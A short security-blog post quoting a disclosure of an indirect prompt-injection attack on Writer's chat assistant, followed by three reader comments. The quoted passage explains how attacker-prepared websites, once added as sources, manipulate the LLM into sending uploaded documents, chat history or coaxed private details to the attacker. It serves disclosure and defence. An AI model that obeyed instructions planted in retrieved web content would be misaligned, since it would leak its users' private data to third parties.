Data Exfiltration Using Indirect Prompt Injection

Interesting attack on a LLM:

In Writer, users can enter a ChatGPT-like session to edit or create their documents. In this chat session, the LLM can retrieve information from sources on the web to assist users in creation of their documents. We show that attackers can prepare websites that, when a user adds them as a source, manipulate the LLM into sending private information to the attacker or perform other malicious activities.

The data theft can include documents the user has uploaded, their chat history or potentially specific private information the chat model can convince the user to divulge at the attacker’s behest.

Tags: chatbots, LLM, vulnerabilities

Posted on December 22, 2023 at 7:05 AM • 3 Comments

Comments

Morley • December 22, 2023 12:14 PM

I wonder the expense to fuzzy search all results for private data. Unless this is one of those LLMs where you can say, “in the style of Shakespeare”. I wonder if a second, security-filter LLM would be as big or bigger than the original.

Clive Robinson • December 22, 2023 12:47 PM

@ ALL,

Bearing in mind my point of view[1].

This does not in the slightest surprise me.

But what of others,

“Are you surprised by this?”

It would be interesting to find out the general view.

[1] I’ve been saying for some time now on this blog and other places I think that LLM ML AI is primarily an insidious “surveillance tool” of great effectiveness…

MikeOh Shark • December 23, 2023 6:44 AM

Allow access to LLMs? NO!

I don’t even trust the current trend to put help files on the web. I understand the programmer’s desire for better metrics but many of the tools I use run in firejails that disable web access. At least I know that my laptop isn’t useless when I don’t have web access.

Of course I do need the feeds to see what is going on. 🙂

Schneier on Security

Data Exfiltration Using Indirect Prompt Injection

Comments

Leave a comment Cancel reply